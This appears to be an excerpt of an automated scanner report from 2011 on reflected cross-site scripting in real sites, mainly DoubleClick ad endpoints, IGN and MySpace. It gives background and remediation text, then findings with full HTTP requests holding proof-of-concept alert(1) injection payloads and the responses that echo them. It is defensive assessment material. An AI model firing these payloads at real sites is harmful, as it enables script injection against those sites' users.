1.705. http://xbox360.ign.com/articles/114/1147803p1.html [name of an arbitrarily supplied request parameter]

1.706. http://xbox360.ign.com/articles/114/1147803p1.html [name of an arbitrarily supplied request parameter]

1.707. http://xbox360.ign.com/articles/114/1147942p1.html [name of an arbitrarily supplied request parameter]

1.708. http://xbox360.ign.com/articles/114/1147942p1.html [name of an arbitrarily supplied request parameter]

1.709. http://xbox360.ign.com/articles/114/1148006p1.html [name of an arbitrarily supplied request parameter]

1.710. http://xbox360.ign.com/articles/114/1148006p1.html [name of an arbitrarily supplied request parameter]

1.711. http://xbox360.ign.com/articles/114/1148025c.html [name of an arbitrarily supplied request parameter]

1.712. http://xbox360.ign.com/articles/114/1148025c.html [name of an arbitrarily supplied request parameter]

1.713. http://xbox360.ign.com/articles/114/1148025p1.html [name of an arbitrarily supplied request parameter]

1.714. http://xbox360.ign.com/articles/114/1148025p1.html [name of an arbitrarily supplied request parameter]

1.715. http://xbox360.ign.com/articles/114/1148045c.html [name of an arbitrarily supplied request parameter]

1.716. http://xbox360.ign.com/articles/114/1148045c.html [name of an arbitrarily supplied request parameter]

1.717. http://xbox360.ign.com/articles/114/1148045p1.html [name of an arbitrarily supplied request parameter]

1.718. http://xbox360.ign.com/articles/114/1148045p1.html [name of an arbitrarily supplied request parameter]

1.719. http://xbox360.ign.com/articles/114/1148058c.html [name of an arbitrarily supplied request parameter]

1.720. http://xbox360.ign.com/articles/114/1148058c.html [name of an arbitrarily supplied request parameter]

1.721. http://xbox360.ign.com/articles/114/1148058p1.html [name of an arbitrarily supplied request parameter]

1.722. http://xbox360.ign.com/articles/114/1148058p1.html [name of an arbitrarily supplied request parameter]

1.723. http://xbox360.ign.com/index/features.html [name of an arbitrarily supplied request parameter]

1.724. http://xbox360.ign.com/index/features.html [name of an arbitrarily supplied request parameter]

1.725. http://xbox360.ign.com/index/games.html [name of an arbitrarily supplied request parameter]

1.726. http://xbox360.ign.com/index/games.html [name of an arbitrarily supplied request parameter]

1.727. http://xbox360.ign.com/index/images.html [name of an arbitrarily supplied request parameter]

1.728. http://xbox360.ign.com/index/images.html [name of an arbitrarily supplied request parameter]

1.729. http://xbox360.ign.com/index/latest-updates.html [name of an arbitrarily supplied request parameter]

1.730. http://xbox360.ign.com/index/latest-updates.html [name of an arbitrarily supplied request parameter]

1.731. http://xbox360.ign.com/index/latest-updates.html [types parameter]

1.732. http://xbox360.ign.com/index/latest-updates.html [types parameter]

1.733. http://xbox360.ign.com/index/latest-updates.html [types parameter]

1.734. http://xbox360.ign.com/index/news.html [name of an arbitrarily supplied request parameter]

1.735. http://xbox360.ign.com/index/news.html [name of an arbitrarily supplied request parameter]

1.736. http://xbox360.ign.com/index/previews.html [name of an arbitrarily supplied request parameter]

1.737. http://xbox360.ign.com/index/previews.html [name of an arbitrarily supplied request parameter]

1.738. http://xbox360.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]

1.739. http://xbox360.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]

1.740. http://xbox360.ign.com/index/upcoming.html [name of an arbitrarily supplied request parameter]

1.741. http://xbox360.ign.com/index/upcoming.html [name of an arbitrarily supplied request parameter]

1.742. http://xbox360.ign.com/index/videos.html [name of an arbitrarily supplied request parameter]

1.743. http://xbox360.ign.com/index/videos.html [name of an arbitrarily supplied request parameter]

1.744. http://xbox360.ign.com/objects/055/055051.html [name of an arbitrarily supplied request parameter]

1.745. http://xbox360.ign.com/objects/055/055051.html [name of an arbitrarily supplied request parameter]

1.746. http://xbox360.ign.com/objects/064/064330.html [name of an arbitrarily supplied request parameter]

1.747. http://xbox360.ign.com/objects/064/064330.html [name of an arbitrarily supplied request parameter]

1.748. http://xbox360.ign.com/objects/070/070921.html [name of an arbitrarily supplied request parameter]

1.749. http://xbox360.ign.com/objects/070/070921.html [name of an arbitrarily supplied request parameter]

1.750. http://xbox360.ign.com/objects/077/077644.html [name of an arbitrarily supplied request parameter]

1.751. http://xbox360.ign.com/objects/077/077644.html [name of an arbitrarily supplied request parameter]

1.752. http://xbox360.ign.com/objects/077/077723.html [name of an arbitrarily supplied request parameter]

1.753. http://xbox360.ign.com/objects/077/077723.html [name of an arbitrarily supplied request parameter]

1.754. http://xbox360.ign.com/objects/080/080342.html [name of an arbitrarily supplied request parameter]

1.755. http://xbox360.ign.com/objects/080/080342.html [name of an arbitrarily supplied request parameter]

1.756. http://xbox360.ign.com/objects/142/14221217.html [name of an arbitrarily supplied request parameter]

1.757. http://xbox360.ign.com/objects/142/14221217.html [name of an arbitrarily supplied request parameter]

1.758. http://xbox360.ign.com/objects/142/14235014.html [name of an arbitrarily supplied request parameter]

1.759. http://xbox360.ign.com/objects/142/14235014.html [name of an arbitrarily supplied request parameter]

1.760. http://xbox360.ign.com/objects/142/14293266.html [name of an arbitrarily supplied request parameter]

1.761. http://xbox360.ign.com/objects/142/14293266.html [name of an arbitrarily supplied request parameter]

1.762. http://xbox360.ign.com/objects/143/14304771.html [name of an arbitrarily supplied request parameter]

1.763. http://xbox360.ign.com/objects/143/14304771.html [name of an arbitrarily supplied request parameter]

1.764. http://xboxlive.ign.com/ [name of an arbitrarily supplied request parameter]

1.765. http://xboxlive.ign.com/ [name of an arbitrarily supplied request parameter]

1.766. http://xboxlive.ign.com/articles/113/1134848p1.html [name of an arbitrarily supplied request parameter]

1.767. http://xboxlive.ign.com/articles/113/1134848p1.html [name of an arbitrarily supplied request parameter]

1.768. http://xboxlive.ign.com/index/games.html [name of an arbitrarily supplied request parameter]

1.769. http://xboxlive.ign.com/index/games.html [name of an arbitrarily supplied request parameter]

1.770. http://xboxlive.ign.com/index/latest-updates.html [name of an arbitrarily supplied request parameter]

1.771. http://xboxlive.ign.com/index/latest-updates.html [name of an arbitrarily supplied request parameter]

1.772. http://api.myspace.com/-/opensearch/extensions/1.0/ [Referer HTTP header]

1.773. http://support.igninsider.com/ics/support/default.asp [Referer HTTP header]

1.774. http://wrapper.giga.de/a [Referer HTTP header]

1.775. http://wrapper.ign.com/a [Referer HTTP header]

1.776. http://myspace.com/ [name of an arbitrarily supplied request parameter]

1.777. http://optimized-by.rubiconproject.com/a/8276/13378/25879-2.js [ruid cookie]

1.778. http://s50.sitemeter.com/js/counter.js [IP cookie]

1.779. http://searchservice.myspace.com/index.cfm [d parameter]

1.780. http://searchservice.myspace.com/index.cfm [fuseaction parameter]

1.781. http://searchservice.myspace.com/index.cfm [g parameter]

1.782. http://searchservice.myspace.com/index.cfm [loc parameter]

1.783. http://searchservice.myspace.com/index.cfm [maxAge parameter]

1.784. http://searchservice.myspace.com/index.cfm [minAge parameter]

1.785. http://searchservice.myspace.com/index.cfm [name of an arbitrarily supplied request parameter]

1.786. http://searchservice.myspace.com/index.cfm [npic parameter]

1.787. http://searchservice.myspace.com/index.cfm [pg parameter]

1.788. http://searchservice.myspace.com/index.cfm [qry parameter]

1.789. http://searchservice.myspace.com/index.cfm [type parameter]

1.790. http://tag.admeld.com/ad/iframe/177/ignus/300x250/ign_front [meld_sess cookie]

1.791. http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us [meld_sess cookie]

1.792. http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us [meld_sess cookie]

1.793. http://tag.admeld.com/ad/iframe/185/thechive_sites/300x250/thechive_us [meld_sess cookie]

1.794. http://tag.admeld.com/ad/iframe/185/thechive_sites/300x250/thechive_us [meld_sess cookie]

1.795. http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us [meld_sess cookie]

1.796. http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us [meld_sess cookie]

1.797. http://tag.admeld.com/ad/json/100/glamtoptier/160x600/420105803 [meld_sess cookie]

1.798. http://tag.admeld.com/ad/json/100/glamtoptier/300x250/420105803 [meld_sess cookie]

1.799. http://tag.admeld.com/ad/json/100/glamtoptier/728x90/420105803 [meld_sess cookie]

1.800. http://www2.glam.com/app/site/affiliate/viewChannelModule.act [glam_bt cookie]

1.801. http://www2.glam.com/app/site/affiliate/viewChannelModule.act [glam_sid cookie]

1.802. http://www2.glam.com/app/site/affiliate/viewChannelModule.act [qcsegs cookie]

1.803. http://www35.glam.com/gad/glamadapt_jsrv.act [glam_sid cookie]



1. Cross-site scripting (reflected)
There are 803 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://ad.doubleclick.net/adj/N4881.mmath/B5196269.16 [mt_adid parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4881.mmath/B5196269.16

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ecb9a'-alert(1)-'9f8b5bd9678 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4881.mmath/B5196269.16;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=115062657883708758&mt_id=108209&mt_adid=100293ecb9a'-alert(1)-'9f8b5bd9678&redirect=;ord=115062657883708758? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/300x250/thechive_us?t=1297045626926&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:27:19 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5832

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Jan 20 17:08:58 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
3Bh%3Dv8/3aa7/f/7e/%2a/l%3B235303334%3B0-0%3B0%3B59104090%3B4307-300/250%3B40362855/40380642/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=115062657883708758&mt_id=108209&mt_adid=100293ecb9a'-alert(1)-'9f8b5bd9678&redirect=http%3a%2f%2fclk.redcated/GRK/go/296095966/direct/01/\">
...[SNIP]...

1.2. http://ad.doubleclick.net/adj/N4881.mmath/B5196269.16 [mt_adid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4881.mmath/B5196269.16

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ea05f"-alert(1)-"d7405e6c27 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4881.mmath/B5196269.16;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=115062657883708758&mt_id=108209&mt_adid=100293ea05f"-alert(1)-"d7405e6c27&redirect=;ord=115062657883708758? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/300x250/thechive_us?t=1297045626926&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:27:15 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5828

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Jan 20 17:08:58 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
3Bh%3Dv8/3aa7/f/7d/%2a/l%3B235303334%3B0-0%3B0%3B59104090%3B4307-300/250%3B40362855/40380642/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=115062657883708758&mt_id=108209&mt_adid=100293ea05f"-alert(1)-"d7405e6c27&redirect=http%3a%2f%2fclk.redcated/GRK/go/296095966/direct/01/");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var
...[SNIP]...

1.3. http://ad.doubleclick.net/adj/N4881.mmath/B5196269.16 [mt_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4881.mmath/B5196269.16

Issue detail

The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b345"-alert(1)-"d5c45be131d was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4881.mmath/B5196269.16;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=115062657883708758&mt_id=1082092b345"-alert(1)-"d5c45be131d&mt_adid=100293&redirect=;ord=115062657883708758? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/300x250/thechive_us?t=1297045626926&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:27:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5832

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Jan 20 17:08:58 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
lick.net/click%3Bh%3Dv8/3aa7/f/7e/%2a/l%3B235303334%3B0-0%3B0%3B59104090%3B4307-300/250%3B40362855/40380642/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=115062657883708758&mt_id=1082092b345"-alert(1)-"d5c45be131d&mt_adid=100293&redirect=http%3a%2f%2fclk.atdmt.com/GRK/go/296095966/direct/01/");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "
...[SNIP]...

1.4. http://ad.doubleclick.net/adj/N4881.mmath/B5196269.16 [mt_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4881.mmath/B5196269.16

Issue detail

The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 64a23'-alert(1)-'2677801c6b9 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4881.mmath/B5196269.16;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=115062657883708758&mt_id=10820964a23'-alert(1)-'2677801c6b9&mt_adid=100293&redirect=;ord=115062657883708758? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/300x250/thechive_us?t=1297045626926&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:27:11 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5832

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Jan 20 17:08:58 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
lick.net/click%3Bh%3Dv8/3aa7/f/7e/%2a/l%3B235303334%3B0-0%3B0%3B59104090%3B4307-300/250%3B40362855/40380642/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=115062657883708758&mt_id=10820964a23'-alert(1)-'2677801c6b9&mt_adid=100293&redirect=http%3a%2f%2fclk.atdmt.com/GRK/go/296095966/direct/01/\">
...[SNIP]...

1.5. http://ad.doubleclick.net/adj/N4881.mmath/B5196269.16 [redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4881.mmath/B5196269.16

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a56a1'-alert(1)-'9136e52bb72 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4881.mmath/B5196269.16;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=115062657883708758&mt_id=108209&mt_adid=100293&redirect=a56a1'-alert(1)-'9136e52bb72 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/300x250/thechive_us?t=1297045626926&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5832
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 07 Feb 2011 02:27:28 GMT
Expires: Mon, 07 Feb 2011 02:27:28 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Jan 20 17:08:58 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
aa7/f/7e/%2a/l%3B235303334%3B0-0%3B0%3B59104090%3B4307-300/250%3B40362855/40380642/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=115062657883708758&mt_id=108209&mt_adid=100293&redirect=a56a1'-alert(1)-'9136e52bb72http%3a%2f%2fclk.atdmt.com/GRK/go/296095966/direct/01/\">
...[SNIP]...

1.6. http://ad.doubleclick.net/adj/N4881.mmath/B5196269.16 [redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4881.mmath/B5196269.16

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93598"-alert(1)-"2cf0fabfdd0 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4881.mmath/B5196269.16;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=115062657883708758&mt_id=108209&mt_adid=100293&redirect=93598"-alert(1)-"2cf0fabfdd0 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/300x250/thechive_us?t=1297045626926&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5832
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 07 Feb 2011 02:27:23 GMT
Expires: Mon, 07 Feb 2011 02:27:23 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Jan 20 17:08:58 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
aa7/f/7e/%2a/l%3B235303334%3B0-0%3B0%3B59104090%3B4307-300/250%3B40362855/40380642/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=115062657883708758&mt_id=108209&mt_adid=100293&redirect=93598"-alert(1)-"2cf0fabfdd0http%3a%2f%2fclk.atdmt.com/GRK/go/296095966/direct/01/");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow
...[SNIP]...

1.7. http://ad.doubleclick.net/adj/N4881.mmath/B5196269.16 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4881.mmath/B5196269.16

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e079"-alert(1)-"2a7444a0285 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4881.mmath/B5196269.16;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=1150626578837087582e079"-alert(1)-"2a7444a0285&mt_id=108209&mt_adid=100293&redirect=;ord=115062657883708758? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/300x250/thechive_us?t=1297045626926&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:26:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5832

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Jan 20 17:08:58 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
://ad.doubleclick.net/click%3Bh%3Dv8/3aa7/f/7e/%2a/l%3B235303334%3B0-0%3B0%3B59104090%3B4307-300/250%3B40362855/40380642/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=1150626578837087582e079"-alert(1)-"2a7444a0285&mt_id=108209&mt_adid=100293&redirect=http%3a%2f%2fclk.redcated/GRK/go/296095966/direct/01/");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscr
...[SNIP]...

1.8. http://ad.doubleclick.net/adj/N4881.mmath/B5196269.16 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4881.mmath/B5196269.16

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60df4'-alert(1)-'c9f82baf3eb was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4881.mmath/B5196269.16;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=11506265788370875860df4'-alert(1)-'c9f82baf3eb&mt_id=108209&mt_adid=100293&redirect=;ord=115062657883708758? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
